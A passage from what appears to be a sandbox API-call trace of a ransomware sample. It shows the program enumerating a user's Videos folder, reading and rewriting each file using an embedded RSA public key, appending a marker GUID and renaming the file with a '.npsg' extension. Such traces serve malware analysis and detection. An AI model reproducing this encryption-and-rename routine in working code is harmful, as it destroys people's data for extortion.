hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0237.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0237.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0237.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0237.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34004b8 [0237.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0237.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0237.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0237.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0237.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34004d0 [0237.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0237.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0237.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34004a0 [0237.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0237.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400530 [0237.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0237.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0237.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400500 [0237.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34004e8 [0237.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400548 [0237.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34004e8 | out: hHeap=0x620000) returned 1 [0237.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34004e8 [0237.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400500 | out: hHeap=0x620000) returned 1 [0237.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0237.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0237.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0237.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34004b8 | out: hHeap=0x620000) returned 1 [0237.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34004b8 [0237.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0237.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400518 | out: hHeap=0x620000) returned 1 [0237.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0237.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400548 | out: hHeap=0x620000) returned 1 [0237.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0237.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7bb78 [0237.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0237.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0237.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34004b8 | out: hHeap=0x620000) returned 1 [0237.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fd28 [0237.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0237.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0237.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0237.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0237.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0237.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0237.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0237.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0237.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0237.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34004e8 | out: hHeap=0x620000) returned 1 [0237.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0237.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400530 | out: hHeap=0x620000) returned 1 [0237.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34004d0 | out: hHeap=0x620000) returned 1 [0237.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34004a0 | out: hHeap=0x620000) returned 1 [0237.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0237.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0237.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0237.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400488 | out: hHeap=0x620000) returned 1 [0237.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95ce0 | out: hHeap=0x620000) returned 1 [0237.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0237.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0237.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0237.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0237.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0237.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0237.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.139] WriteFile (in: hFile=0x644, lpBuffer=0x3b95d50*, nNumberOfBytesToWrite=0x18c4f, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b95d50*, lpNumberOfBytesWritten=0x39afb14*=0x18c4f, lpOverlapped=0x0) returned 1 [0237.140] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95d50 | out: hHeap=0x620000) returned 1 [0237.140] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x18c54, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.140] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.140] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7c898 [0237.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b81cd0 [0237.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b81cd0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0237.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b82100 [0237.140] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0237.140] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7c898 | out: hHeap=0x620000) returned 1 [0237.140] WriteFile (in: hFile=0x644, lpBuffer=0x3b82100*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b82100*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0237.140] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b82100 | out: hHeap=0x620000) returned 1 [0237.140] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.140] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.141] CloseHandle (hObject=0x644) returned 1 [0237.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0237.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b81cd0 [0237.145] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0237.145] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FA42ucFZ7btbWqUgPC.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fa42ucfz7btbwqugpc.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FA42ucFZ7btbWqUgPC.flv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fa42ucfz7btbwqugpc.flv.npsg")) returned 1 [0237.146] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0237.146] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.146] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a660 | out: hHeap=0x620000) returned 1 [0237.147] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x296de6d0, ftCreationTime.dwHighDateTime=0x1d5c051, ftLastAccessTime.dwLowDateTime=0x6a5d2120, ftLastAccessTime.dwHighDateTime=0x1d5b61e, ftLastWriteTime.dwLowDateTime=0x6a5d2120, ftLastWriteTime.dwHighDateTime=0x1d5b61e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imXqHXuq", cAlternateFileName="")) returned 1 [0237.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7c898 [0237.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d1f0 [0237.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0237.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d1f0 | out: hHeap=0x620000) returned 1 [0237.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7c898 | out: hHeap=0x620000) returned 1 [0237.148] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f47cb60, ftCreationTime.dwHighDateTime=0x1d5c19d, ftLastAccessTime.dwLowDateTime=0x5bb6a8f0, ftLastAccessTime.dwHighDateTime=0x1d5b63f, ftLastWriteTime.dwLowDateTime=0x5bb6a8f0, ftLastWriteTime.dwHighDateTime=0x1d5b63f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kYk5K01VVlQpw", cAlternateFileName="KYK5K0~1")) returned 1 [0237.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0237.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c44b0 [0237.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c43c0 [0237.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c44b0 | out: hHeap=0x620000) returned 1 [0237.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0237.148] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48c56c20, ftCreationTime.dwHighDateTime=0x1d5ba9c, ftLastAccessTime.dwLowDateTime=0x6aeb2350, ftLastAccessTime.dwHighDateTime=0x1d5b91e, ftLastWriteTime.dwLowDateTime=0x6aeb2350, ftLastWriteTime.dwHighDateTime=0x1d5b91e, nFileSizeHigh=0x0, nFileSizeLow=0xfb62, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WQJ5oVHU7.mkv", cAlternateFileName="WQJ5OV~1.MKV")) returned 1 [0237.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0237.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x68a920 [0237.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0237.148] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WQJ5oVHU7.mkv") returned=".mkv" [0237.148] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WQJ5oVHU7.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wqj5ovhu7.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.149] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=64354) returned 1 [0237.149] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.152] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xfb3c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.152] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.155] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.155] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xfb62, lpOverlapped=0x0) returned 1 [0237.156] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.156] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.156] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.156] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.156] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a660) returned 1 [0237.157] CryptCreateHash (in: hProv=0x67a660, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.157] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.157] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.157] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.157] GetLastError () returned 0x0 [0237.158] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.158] CryptReleaseContext (hProv=0x67a660, dwFlags=0x0) returned 1 [0237.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.158] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.158] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.158] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfb60) returned 0x3b95d50 [0237.158] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0237.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95ce0 [0237.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400488 [0237.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3408dc8 [0237.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34004a0 [0237.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34004d0 [0237.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400530 [0237.159] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34004e8 [0237.159] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0237.160] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xfb62, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.160] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.160] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.160] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.160] CloseHandle (hObject=0x644) returned 1 [0237.162] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WQJ5oVHU7.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wqj5ovhu7.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WQJ5oVHU7.mkv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wqj5ovhu7.mkv.npsg")) returned 1 [0237.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0237.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.162] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x68a920 | out: hHeap=0x620000) returned 1 [0237.164] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7d88b70, ftCreationTime.dwHighDateTime=0x1d5bb48, ftLastAccessTime.dwLowDateTime=0x391c5720, ftLastAccessTime.dwHighDateTime=0x1d5c046, ftLastWriteTime.dwLowDateTime=0x391c5720, ftLastWriteTime.dwHighDateTime=0x1d5c046, nFileSizeHigh=0x0, nFileSizeLow=0x11878, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_5Scyv3UUtL1Q1i1w_tJ.avi", cAlternateFileName="_5SCYV~1.AVI")) returned 1 [0237.164] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS 